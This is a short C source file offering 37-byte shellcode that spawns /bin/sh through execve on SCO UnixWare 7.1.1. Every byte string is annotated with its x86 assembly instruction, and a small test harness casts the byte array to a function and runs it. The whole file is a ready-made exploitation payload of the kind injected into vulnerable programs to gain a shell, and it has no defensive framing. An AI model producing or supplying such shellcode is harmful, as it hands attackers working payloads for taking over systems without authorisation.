/* 37 bytes execve /bin/sh shellcode - SCO UnixWare
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: SCO UnixWare 7.1.1
 */

char code[] =

   "\xb8\xff\xf8\xff\x3c"	// mov     eax, 03cfff8ffh
   "\xf7\xd0"			// not     eax
   "\x50"			// push    eax
   "\x31\xc0"			// xor     eax, eax
   "\xb0\x9a"			// mov     al, 09ah
   "\x50"			// push    eax
   "\x89\xe7"			// mov     edi, esp
   "\x31\xc0"			// xor	   eax, eax
   "\x50"			// push	   eax
   "\x68\x2f\x2f\x73\x68"	// push    dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push    dword 6e69622fh
   "\x89\xe3"			// mov     ebx, esp
   "\x50"			// push    eax
   "\x54"			// push    esp
   "\x53"			// push    ebx
   "\xb0\x3b"			// mov     al, 59
   "\xff\xd7";			// call    edi


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}